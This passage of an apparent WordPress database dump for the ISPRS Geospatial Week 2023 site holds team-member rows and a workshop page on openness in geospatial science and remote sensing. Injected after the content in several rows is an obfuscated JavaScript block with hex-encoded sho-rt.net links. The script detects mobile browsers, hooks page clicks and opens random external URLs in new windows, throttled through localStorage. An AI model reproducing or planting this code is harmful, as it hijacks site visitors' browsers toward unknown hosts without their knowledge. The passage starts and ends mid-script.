Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Timur Obukhov','','publish','closed','closed','','timur-obukhov','','','2023-01-01 19:00:57','2023-01-01 19:00:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3508',0,'dt_team','',0),
(3509,1,'2023-01-01 18:57:51','2023-01-01 18:57:51','','w274','','inherit','open','closed','','w274','','','2023-01-01 18:57:51','2023-01-01 18:57:51','',3508,'https://gsw2023.com/wp-content/uploads/2023/01/w274.jpg',0,'attachment','image/jpeg',0),
(3510,1,'2023-01-01 18:59:47','2023-01-01 18:59:47','<!-- wp:paragraph -->\n<p>Council for Scientific and Industrial Research, South Africa (ICWG IV/III/II)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Bolelang Sibolla','','publish','closed','closed','','bolelang-sibolla','','','2023-01-01 19:00:48','2023-01-01 19:00:48','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3510',0,'dt_team','',0),
(3511,1,'2023-01-01 18:59:35','2023-01-01 18:59:35','','w275','','inherit','open','closed','','w275','','','2023-01-01 18:59:35','2023-01-01 18:59:35','',3510,'https://gsw2023.com/wp-content/uploads/2023/01/w275.jpg',0,'attachment','image/jpeg',0),
(3512,1,'2023-01-01 19:03:13','2023-01-01 19:03:13','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 